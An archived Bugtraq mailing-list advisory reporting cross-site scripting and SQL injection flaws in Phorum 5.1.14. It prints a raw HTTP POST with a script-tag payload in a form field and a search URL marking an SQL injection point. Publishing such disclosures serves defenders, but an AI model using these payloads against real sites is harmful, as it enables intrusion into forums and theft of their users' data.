Home page logo
/

bugtraq logo Bugtraq mailing list archives

Phorum 5.1.14 XSS SQL injection Vulnerability
From: securityconnection () gmail com
Date: 11 Jul 2006 09:10:30 -0000

Phorum 5.1.14
http://www.phorum.org
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/posting.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 447
message_id=0&forum_id=1&mode=<script>alert(/EllipsisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/search.php?1,search=1,page='[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]